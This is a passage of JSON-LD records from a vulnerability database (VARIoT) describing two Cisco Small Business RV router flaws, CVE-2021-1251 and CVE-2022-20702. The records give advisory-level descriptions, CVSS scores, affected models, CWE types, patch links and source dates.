                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1251",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1251",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1251",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-26111",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-435",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1251",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1251",
            "trust": 3.9
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1171.3",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "id": "VAR-202104-0377",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          }
        ],
        "trust": 1.1394850175
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:37:02.684000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-multi-lldp-u7e4chCe",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe"
          },
          {
            "title": "Patch for Cisco Link Layer Discovery Protocol Denial of Service Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/257011"
          },
          {
            "title": "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147017"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-multi-lldp-u7e4chCe"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-401",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1251"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1171.3"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/119.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "date": "2021-12-13T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "date": "2021-04-08T04:15:11.860000",
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-09T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-26111"
          },
          {
            "date": "2021-04-14T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1251"
          },
          {
            "date": "2021-12-13T02:45:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          },
          {
            "date": "2024-11-21T05:43:55.783000",
            "db": "NVD",
            "id": "CVE-2021-1251"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router \u00a0 Buffer Error Vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005330"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-435"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202202-0326

    Vulnerability from variot - Updated: 2024-11-23 22:04

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202202-0326",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv160w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv340",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.24"
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jeongun Baek of Diffense",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ],
        "trust": 1.3
      },
      "cve": "CVE-2022-20702",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 9.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2022-20702",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 7.2,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.2,
                "id": "CVE-2022-20702",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20702",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.2,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20702",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "High",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "LOCAL",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 7.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.0,
                "id": "CVE-2022-20702",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20702",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20702",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20702",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20702",
                "trust": 0.7,
                "value": "CRITICAL"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202202-163",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20702",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows local attackers to escalate privileges on affected installations of Cisco RV340 routers. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.The specific flaw exists within the utility-ping-request script. The issue results from the creation of a temporary file with insecure permissions. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20702",
            "trust": 4.0
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-420",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15946",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "id": "VAR-202202-0326",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.426000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=183841"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-420/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20702"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/alphabugx/cve-2022-23305"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20702"
          },
          {
            "date": "2023-05-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004938"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-163"
          },
          {
            "date": "2022-02-10T18:15:09.137000",
            "db": "NVD",
            "id": "CVE-2022-20702"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-420"
          },
          {
